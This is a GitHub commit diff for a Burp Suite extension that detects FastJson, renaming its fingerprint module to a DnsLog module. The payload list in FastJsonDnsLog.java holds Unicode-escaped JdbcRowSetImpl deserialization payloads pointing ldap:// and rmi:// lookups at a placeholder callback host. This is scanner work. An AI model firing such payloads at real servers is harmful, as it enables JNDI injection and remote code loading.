Skip to content

Commit

Permalink
1,模块名称更改 2,显示优化
Browse files Browse the repository at this point in the history
  • Loading branch information
@pmiaowu
pmiaowu committed Jun 23, 2021
1 parent efc63ea commit 91e16d3
Show file tree
Hide file tree
Showing 5 changed files with 107 additions and 98 deletions.
52 changes: 32 additions & 20 deletions ...nsionMethod/FastJsonFingerprintType1.java → .../ExtensionMethod/FastJsonDnsLogType1.java
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
package burp.Application.FastJsonFingerprintDetection.ExtensionMethod;
package burp.Application.FastJsonDnsLogDetection.ExtensionMethod;

import java.io.PrintWriter;
import java.net.URL;
Expand All @@ -12,7 +12,7 @@
import burp.DnsLogModule.DnsLog;
import burp.Bootstrap.CustomHelpers;

public class FastJsonFingerprintType1 extends FastJsonFingerprintTypeAbstract {
public class FastJsonDnsLogType1 extends FastJsonDnsLogTypeAbstract {
private IBurpExtenderCallbacks callbacks;
private IExtensionHelpers helpers;

Expand All @@ -32,7 +32,7 @@ public class FastJsonFingerprintType1 extends FastJsonFingerprintTypeAbstract {
private ArrayList<String> dnsLogUrlArrayList = new ArrayList<String>();
private ArrayList<IHttpRequestResponse> httpRequestResponseArrayList = new ArrayList<IHttpRequestResponse>();

public FastJsonFingerprintType1(
public FastJsonDnsLogType1(
IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String[] payloads,
Expand All @@ -52,25 +52,25 @@ public FastJsonFingerprintType1(
this.startDate = startDate;
this.maxExecutionTime = maxExecutionTime;

this.setExtensionName("FastJsonFingerprintType1");
this.setExtensionName("FastJsonDnsLogType1");
this.registerExtension();

this.runExtension();
}

private void runExtension() {
if (this.payloads == null || this.payloads.length <= 0) {
throw new IllegalArgumentException("FastJson指纹识别扩展-要进行检测的payload不能为空, 请检查");
throw new IllegalArgumentException("FastJsonDnsLog识别扩展-要进行检测的payload不能为空, 请检查");
}

// FastJson指纹识别
// FastJsonDnsLog识别
for (String payload : this.payloads) {
// 说明接收到了dnslog请求确定是FastJson
if (this.isFastJsonFingerprint()) {
if (this.isFastJson()) {
return;
}

// 如果dnslog有内容但是 this.isFastJsonFingerprint() 为false
// 如果dnslog有内容但是 this.isFastJson() 为false
// 这可能是因为 请求发出去了 dnslog还没反应过来
// 这种情况后面的循环就没必要了, 退出该循环
// 等待二次验证即可
Expand All @@ -85,16 +85,16 @@ private void runExtension() {
int currentTime = this.customHelpers.getSecondTimestamp(new Date());
int runTime = currentTime - startTime;
if (runTime >= this.maxExecutionTime) {
throw new TaskTimeoutException("fastjson fingerprint scan task timeout");
throw new TaskTimeoutException("FastJson DnsLog scan task timeout");
}

this.fastJsonFingerprintDetection(payload);
this.fastJsonDnsLogDetection(payload);
}

// 防止因为dnslog卡导致没有检测到的问题, 这里进行二次检测, 保证不会漏报
// 睡眠一段时间, 给dnslog一个缓冲时间
try {
Thread.sleep(6000);
Thread.sleep(8000);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
Expand Down Expand Up @@ -123,10 +123,17 @@ private void runExtension() {
}

/**
* 指纹检测
* DnsLog检测
*/
private void fastJsonFingerprintDetection(String payload) {
String dnsLogUrl = this.customHelpers.randomStr(8) + "." + this.dnsLog.run().getTemporaryDomainName();
private void fastJsonDnsLogDetection(String payload) {
String dnsLogUrl = null;
if (payload.indexOf("ldap://") >= 1) {
dnsLogUrl = this.customHelpers.randomStr(8) + "." + "ldap" + "." + this.dnsLog.run().getTemporaryDomainName();
} else if (payload.indexOf("rmi://") >= 1) {
dnsLogUrl = this.customHelpers.randomStr(8) + "." + "rmi" + "." + this.dnsLog.run().getTemporaryDomainName();
} else {
dnsLogUrl = this.customHelpers.randomStr(8) + "." + this.dnsLog.run().getTemporaryDomainName();
}

// 发送请求
IHttpRequestResponse newHttpRequestResponse = this.makeHttpRequest(payload, dnsLogUrl);
Expand Down Expand Up @@ -214,22 +221,22 @@ private byte[] buildParameter(String payload, String dnsLogUrl) {
* 设置问题详情
*/
private void setIssuesDetail(IHttpRequestResponse httpRequestResponse, String dnsLogUrl) {
this.setFastJsonFingerprint();
this.setFastJson();
this.setHttpRequestResponse(httpRequestResponse);

this.sendDnsLogUrl = dnsLogUrl;
}

@Override
public IScanIssue export() {
if (!this.isFastJsonFingerprint()) {
if (!this.isFastJson()) {
return null;
}

IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl();

String str1 = String.format("<br/>=============FastJsonFingerprintType1============<br/>");
String str1 = String.format("<br/>=============FastJsonDnsLogType1============<br/>");
String str2 = String.format("ExtensionMethod: %s <br/>", this.getExtensionName());
String str3 = String.format("sendDnsLogUrl: %s <br/>", this.sendDnsLogUrl);
String str4 = String.format("=====================================<br/>");
Expand All @@ -244,18 +251,23 @@ public IScanIssue export() {

String detail = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8;

String severity = "Medium";
if (str7.indexOf("ldap.") >= 1 || str7.indexOf("rmi.") >= 1) {
severity = "High";
}

return new CustomScanIssue(
newHttpRequestResponse.getHttpService(),
newHttpRequestUrl,
new IHttpRequestResponse[] { newHttpRequestResponse },
"FastJson",
detail,
"High");
severity);
}

@Override
public void consoleExport() {
if (!this.isFastJsonFingerprint()) {
if (!this.isFastJson()) {
return;
}

Expand All @@ -267,7 +279,7 @@ public void consoleExport() {
PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true);

stdout.println("");
stdout.println("===========FastJson指纹详情============");
stdout.println("===========FastJsonDnsLog模块详情============");
stdout.println("你好呀~ (≧ω≦*)喵~");
stdout.println("这边检测到有一个站点使用了 FastJson并且dns出网 喵~");
stdout.println(String.format("负责检测的插件: %s", this.getExtensionName()));
Expand Down
26 changes: 13 additions & 13 deletions ...thod/FastJsonFingerprintTypeAbstract.java → ...ionMethod/FastJsonDnsLogTypeAbstract.java
View file
Original file line number Diff line number Diff line change
@@ -1,17 +1,17 @@
package burp.Application.FastJsonFingerprintDetection.ExtensionMethod;
package burp.Application.FastJsonDnsLogDetection.ExtensionMethod;

import burp.IHttpRequestResponse;

/**
* FastJson指纹扩展的抽象类
* 所有的FastJson指纹检测的方法都要继承它并实现所有的接口
* FastJsonDnsLog扩展的抽象类
* 所有的FastJsonDnsLog检测的方法都要继承它并实现所有的接口
*/
abstract class FastJsonFingerprintTypeAbstract implements FastJsonFingerprintTypeInterface {
abstract class FastJsonDnsLogTypeAbstract implements FastJsonDnsLogTypeInterface {
private String extensionName = "";

private Boolean isRunExtension = false;

private Boolean isFastJsonFingerprint = false;
private Boolean isFastJson = false;

private String requestIssueName = "";
private String requestIssueValue = "";
Expand All @@ -24,7 +24,7 @@ abstract class FastJsonFingerprintTypeAbstract implements FastJsonFingerprintTyp
*/
protected void setExtensionName(String value) {
if (value == null || value.isEmpty()) {
throw new IllegalArgumentException("FastJson指纹扫描扩展-扩展名称不能为空");
throw new IllegalArgumentException("FastJsonDnsLog扫描扩展-扩展名称不能为空");
}
this.extensionName = value;
}
Expand All @@ -35,7 +35,7 @@ protected void setExtensionName(String value) {
*/
private void extensionNameCheck() {
if (this.extensionName == null || this.extensionName.isEmpty()) {
throw new IllegalArgumentException("请为该FastJson指纹扫描扩展-设置扩展名称");
throw new IllegalArgumentException("请为该FastJsonDnsLog扫描扩展-设置扩展名称");
}
}

Expand Down Expand Up @@ -64,7 +64,7 @@ protected void registerExtension() {
*/
private void registerExtensionCheck() {
if (!this.isRunExtension) {
throw new IllegalArgumentException("注意: 该指纹模块未注册,无法使用");
throw new IllegalArgumentException("注意: 该模块未注册,无法使用");
}
}

Expand All @@ -80,21 +80,21 @@ public Boolean isRunExtension() {
}

/**
* 设置为FastJson指纹
* 设置为FastJson
*/
protected void setFastJsonFingerprint() {
protected void setFastJson() {
this.registerExtensionCheck();
this.isFastJsonFingerprint = true;
this.isFastJson = true;
}

/**
* 是否FastJson框架
* @return Boolean
*/
@Override
public Boolean isFastJsonFingerprint() {
public Boolean isFastJson() {
this.registerExtensionCheck();
return this.isFastJsonFingerprint;
return this.isFastJson;
}

/**
Expand Down
8 changes: 4 additions & 4 deletions ...hod/FastJsonFingerprintTypeInterface.java → ...onMethod/FastJsonDnsLogTypeInterface.java
View file
Original file line number Diff line number Diff line change
@@ -1,18 +1,18 @@
package burp.Application.FastJsonFingerprintDetection.ExtensionMethod;
package burp.Application.FastJsonDnsLogDetection.ExtensionMethod;

import burp.IScanIssue;
import burp.IHttpRequestResponse;

/**
* fastjson指纹扩展的公共接口
* FastJsonDnsLog扩展的公共接口
* 所有的抽象类都要继承它并实现所有的接口
*/
public interface FastJsonFingerprintTypeInterface {
public interface FastJsonDnsLogTypeInterface {
String getExtensionName();

Boolean isRunExtension();

Boolean isFastJsonFingerprint();
Boolean isFastJson();

String getRequestIssueName();

Expand Down
37 changes: 19 additions & 18 deletions ...erprintDetection/FastJsonFingerprint.java → ...stJsonDnsLogDetection/FastJsonDnsLog.java
View file
Original file line number Diff line number Diff line change
@@ -1,14 +1,14 @@
package burp.Application.FastJsonFingerprintDetection;
package burp.Application.FastJsonDnsLogDetection;

import burp.Application.FastJsonFingerprintDetection.ExtensionMethod.*;
import burp.Application.FastJsonDnsLogDetection.ExtensionMethod.*;

import burp.Bootstrap.BurpAnalyzedRequest;
import burp.IBurpExtenderCallbacks;

import java.util.Date;

public class FastJsonFingerprint {
private FastJsonFingerprintTypeInterface fastJsonFingerprintType;
public class FastJsonDnsLog {
private FastJsonDnsLogTypeInterface fastJsonDnsLogType;

// 该模块启动日期
private Date startDate = new Date();
Expand All @@ -17,17 +17,17 @@ public class FastJsonFingerprint {
// 会根据payload的添加而添加
private int maxExecutionTime = 120;

public FastJsonFingerprint(
public FastJsonDnsLog(
IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String callClassName) {
this.init(callbacks, baseAnalyzedRequest, callClassName);
}

private FastJsonFingerprintTypeInterface init(IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String callClassName) {
String[] payloads = {
private FastJsonDnsLogTypeInterface init(IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String callClassName) {
String[] dnsLogPayloads = {
"{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/miao1\",\"autoCommit\":true}}",
"{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"rmi://dnslog-url/miao2\",\"autoCommit\":true}}",
"{\"b\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/miao3\",\"autoCommit\":true}}",
Expand All @@ -39,27 +39,28 @@ private FastJsonFingerprintTypeInterface init(IBurpExtenderCallbacks callbacks,
};

// 获得最终的程序最大执行时间
int keyLength = payloads.length;
int keyLength = dnsLogPayloads.length;
if (keyLength > 20) {
this.maxExecutionTime += (keyLength - 20) * 6;
}

if (callClassName.equals("FastJsonFingerprintType1")) {
FastJsonFingerprintType1 fastJsonFingerprintType = new FastJsonFingerprintType1(
// 使用dnslog判断是否是FastJson的方法
if (callClassName.equals("FastJsonDnsLogType1")) {
FastJsonDnsLogType1 fastJsonDnsLogType = new FastJsonDnsLogType1(
callbacks,
baseAnalyzedRequest,
payloads,
dnsLogPayloads,
this.startDate,
this.maxExecutionTime);
this.fastJsonFingerprintType = fastJsonFingerprintType;
return this.fastJsonFingerprintType;
this.fastJsonDnsLogType = fastJsonDnsLogType;
return this.fastJsonDnsLogType;
}

throw new IllegalArgumentException(
String.format("FastJson指纹识别模块-对不起您输入的 %s 扩展找不到", callClassName));
String.format("FastJsonDnsLog识别模块-对不起您输入的 %s 扩展找不到", callClassName));
}

public FastJsonFingerprintTypeInterface run() {
return this.fastJsonFingerprintType;
public FastJsonDnsLogTypeInterface run() {
return this.fastJsonDnsLogType;
}
}
Loading

0 comments on commit 91e16d3

Please sign in to comment.